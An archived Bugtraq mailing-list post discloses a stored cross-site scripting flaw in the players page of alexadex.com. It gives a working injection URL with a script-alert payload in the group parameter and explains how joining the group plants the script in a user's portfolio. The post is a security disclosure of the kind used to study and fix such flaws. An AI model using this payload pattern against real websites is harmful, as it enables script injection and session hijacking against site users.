[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Alexadex.com players.py XSS Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Alexadex.com players.py XSS Exploit
From: skinnypuppy@xxxxxxxxxxx
Date: 5 May 2006 08:10:04 -0000

+++++++++++++++++++++++++++++++++++++
|Alexadex.com players.py XSS Exploit|
+++++++++++++++++++++++++++++++++++++
May 04,2006

++++++++++++++++++++++++++++++++
|XSS Exploition on alexadex.com|
++++++++++++++++++++++++++++++++

http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPUPPY");</script>

What this will do is add a group with the name: 
<script>alert("SKINNYPUPPY");</script>

When you click the "Join this group" it sets the injected code to your 
Portfolio and when viewed it executes the injected code.

++++++++++++++++++++++++++++++++
EMAIL: skinnypuppy@xxxxxxx

demo: http://www.alexadex.com/ad/user/xss

Prev by Date: Re: DB_eSession deleteSession() SQL injection
Next by Date: Re: gcc 4.1 bug miscompiles pointer range checks, may place you at risk
Previous by thread: Re: DB_eSession deleteSession() SQL injection
Next by thread: Intel wireless service s24evmon.exe confidential information disclosure.
Index(es):
- Date
- Thread